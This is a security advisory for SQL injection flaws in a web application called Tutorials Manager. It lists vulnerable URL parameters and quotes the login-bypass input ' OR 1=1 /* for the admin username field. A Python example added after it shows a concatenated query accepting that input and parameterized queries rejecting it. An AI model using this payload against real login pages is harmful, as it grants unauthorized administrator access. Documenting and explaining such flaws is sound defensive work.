Tutorials Manager Multiple Remote SQL Injection Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept has been provided:

http://www.example.com/guides/index.php?lang=0&CODE=02&id=1[SQL]
http://www.example.com/guides/index.php?lang=0&CODE=01&id=1[SQL]
http://www.example.com/guides/index.php?lang=0&CODE=14&id=1[SQL]
http://www.example.com/guides/admin.php?s=[SOMETHING]&act=own
http://www.example.com/sites/guides/admin.php?s=[SOMETHING]&act=admin&CODE=01

Passing the input ' OR 1=1 /* through the 'username' field of the 'admin.php' script is reported to grant unauthorized administrator access to the affected application.
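The following is an added example, not code from the advisory or from Tutorials Manager: it shows why a login query built by string concatenation accepts the reported 'username' input, and how bound parameters and integer validation of 'id' reject it. The table names, column names, function names and the sample account are assumptions, since the advisory does not show the application's queries; SQLite stands in for the real database.

```python
import sqlite3

# Constructed schema and data: assumptions for illustration only.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('root', 'not-the-real-hash')")
    db.execute("CREATE TABLE guides (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO guides VALUES (1, 'Intro')")
    return db

def login_concatenated(db, username, password):
    # Vulnerable pattern: input becomes part of the SQL text, so a quote
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Hardened pattern: placeholders keep the input as data, never as SQL.
    sql = "SELECT username FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def guide_by_id(db, raw_id):
    # 'id' is numeric: reject anything that is not ASCII digits, then bind it.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT title FROM guides WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchone()

if __name__ == "__main__":
    db = make_db()
    reported = "' OR 1=1 /*"  # the input quoted in the advisory
    print("concatenated query accepts it:", login_concatenated(db, reported, "x"))
    print("parameterized query accepts it:", login_parameterized(db, reported, "x"))
    print("valid id:", guide_by_id(db, "1"))
    try:
        guide_by_id(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected id:", exc)
```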